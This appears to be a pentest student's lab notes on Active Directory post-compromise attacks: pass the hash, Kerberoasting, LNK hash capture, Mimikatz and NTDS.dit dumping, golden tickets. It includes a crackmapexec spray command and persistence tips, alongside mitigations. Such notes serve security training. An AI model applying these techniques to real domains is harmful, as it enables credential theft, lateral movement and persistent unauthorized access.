🏠 Home BlogGitHubπŸ“š Buy Me a Book
Edit

AD - Post-Compromise Attacks

Pass the Hash

crackmapexec

πŸ“Œ Some commands could not be working since CrackMapExec is no longer mantained -> Jump to NetExec for working commands

➑️ crackmapexec - post-exploitation tool that helps automate assessing the security of large Active Directory networks

Pass the Password

crackmapexec smb 192.168.31.0/24 -u fcastle -d MARVEL.local -p Password1
Pass the Password

Pass the Hash

  • Use the administrator user's hash from the SAM dump

Pass the Hash

netexec

➑️ netexec

secretsdump.py

➑️ secretsdump.py from impacket

e.g. of lateral movement Hash Attack

  • LLMNR -> fcastle hash -> cracked -> sprayed the password -> new login found -> secretsdump logins -> local admin hashes -> respray the network with local accounts

  • e.g. Cracking NTLMv1

For mitigation:

  • Avoid re-using local admin passwords

  • Disable guest and administrator accounts

  • Use Privilege Access Management (PAM)

Kerberoasting

➑️ Kerberoasting is a post-exploitation attack technique that attempts to obtain a password hash of an Active Directory account that has a SPN (Service Principal Name), focusing on the acquisition of TGS (Ticket Granting Server) tickets issued by the KDC (Key Distribution Center).

GetUserSPNs.py

➑️ GetUserSPNs.py from impacket

  • e.g. Cracking the $krb5tgs$23$* (RC4 encryption) hash

For mitigation:

  • least privilege - do not run Service Accounts as Domain Admin

  • strong password

Token impersonation

➑️ Tokens are temporary keys that provide access to a system or network without needing to repeatedly input credentials, similar to how cookies work.

  • Delegate - created for logging into machine or Remote Desktop

  • Impersonate - non-interactive

πŸ“Œ Turn on THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs, and login to THEPUNISHER.

  • Dump the secrets from the controller using hawkeye user

For mitigation:

  • limit user/group token creation permission

  • account tiering

  • local admin restriction

LNK File attack

An attacker can place a malicious file in a shared folder, and when triggered, it captures password hashes using a tool like Responder, similar to a watering hole attack where a compromised website delivers malware that can drop such files onto a target's network.

πŸ“Œ Open Powershell on the THEPUNISHER (192.168.31.93) VM.

  • The following PowerShell script creates a shortcut (C:\test.lnk) pointing to a remote file (\\192.168.31.131\@test.png - on the attacker VM), setting its icon, description, and a Ctrl+Alt+T hotkey. It can be used for automation or to trick users into accessing a remote resource, potentially leaking credentials via an SMB request.

  • rename the test.lnk file into @test.lnk to put it on top of the folder list

  • copy the file in \\hydra-dc\hackme file share

Run Responder (on Kali VM):

No just open the \\hydra-dc\hackme share folder in THEPUNISHER VM and check the Responder log for hashes automatically captured.

Automated attack - ff the file share is exposed, use netexec slinky built-in module to create the link/shortcut file on the targeted VM (in all shares with write permissions).

GPP Attacks - cPassword attacks

➑️ The Group Policy Preferences (GPP) allowed admins to create policies with embedded credentials.

  • credentials were encrypted and stored in the cPassword field

  • encryption key was leaked, making it possible to decrypt stored credentials

  • patched in MS14-025, but previously stored credentials remain vulnerable, so it is still relevant for pentesting

For mitigation:

  • Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.

  • Delete existing GPP xml files in SYSVOL containing passwords.

Good article - Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security

Credential dumping with Mimikatz

➑️ Mimikatz - a tool that allows the extraction of plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

πŸ“Œ Turn on SPIDERMAN (192.168.31.92) and login with peterparker with the attached hackme file-share.

  • Open http://192.168.31.131/mimikatz_trunk/x64/ in the SPIDERMAN VM and download all the 4 files inside that directory

  • Run cmd as admin

  • Check for clear-text passwords based on the mounted shared folder for example.

  • Check for NTLM hashes.

  • Mimikatz needs obfuscation and/or antivirus bypass to work on protected systems.

πŸ“Œ Attack strategy for internal pentest

  • Account compromised

  • Quick wins:

    • Pass the hash

    • Secrets dump

    • Pass the hash/password

  • Dig deeper:

    • Enumerate (Bloodhound, users, domain admins, sensitive VMs, etc)

    • Account access

    • Old vulnerabilities

  • "Think outside the box"

    • How can I move laterally until I can move vertically?

πŸ“Œ Post-Domain Compromise Actions

Once the domain is owned:

  • Maximize value for the client:

    • Repeat the process for verification

    • Dump NTDS.dit and crack passwords

    • Enumerate shares for sensitive data

  • Maintain persistence:

    • Plan for lost Domain Admin (DA) access

    • Create a temporary DA account (remember to delete it)

    • Use a Golden Ticket if needed

Dumping NTDS.dit

➑️ NTDS.dit is the Active Directory database file used by Microsoft Windows Domain Controllers (DCs). It stores critical domain information, including:

  • User and computer accounts

  • Password hashes

  • Group memberships and permissions

It is important because:

  • it contains NTLM & Kerberos password hashes, making it a prime target for attackers

  • if dumped using tools like Mimikatz or secretsdump.py, attackers can crack hashes and gain Domain Admin access

  • it enables privilege escalation and persistent access (e.g. Golden Ticket attacks).

  • Get only the NT hashes from the response and try to crack them

Golden Ticket

➑️ A Golden Ticket attack is a Kerberos authentication exploit that allows an attacker to generate forged TGTs (Ticket Granting Tickets), granting them persistent and unrestricted access to an Active Directory (AD) environment.

  1. Obtain the KRBTGT Hash – The attacker dumps the KRBTGT account's NTLM hash from the NTDS.dit database on a domain controller.

  2. Forge a TGT – Using Mimikatz, the attacker crafts a fake Kerberos TGT, setting any username, groups, or privileges.

  3. Gain Domain Access – The forged ticket is used (via Pass-the-Ticket attack) to request service tickets (TGS), allowing access to any resource without authentication expiration.

  4. Persistence – The ticket remains valid even if passwords change, as long as the KRBTGT hash is not reset twice.

❗ When KRBTGT (Kerberos Ticket Granting Ticket) account is compromised, the attacker owns the domain.

Pass the Ticket - mimikatz

πŸ“Œ Turn on THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs.

  • Download Mimikatz on the Domain Controller VM

  • Run cmd as admin on the HYDRA-DC. Proceed to forging a golden ticket with Mimikatz

  • Get the Domain SID and NTLM hash of the krbtgt account from the output

  • Back in Mimikatz, generate the golden ticket

The attacker can use the forged ticket to access Kerberos-integrated resources. Since the TGT is signed and encrypted with the legitimate KRBTGT password hash, domain controllers recognize it as valid authentication. As a result, the domain controller issues Ticket Granting Service (TGS) tickets based on the forged TGT.

  • To open a session with the generated golden ticket:

  • Download and use psexec.exe to run attacks against other computers or get a remote shell on them

Impacket from the Kali VM can be used too for the Pass the Ticket attack using secretdump.py , lookupsid.py, ticketer.py, psexec.py.

PreviousAD - Post-Compromise EnumerationNextAD - Additional Attacks

Last updated

Was this helpful?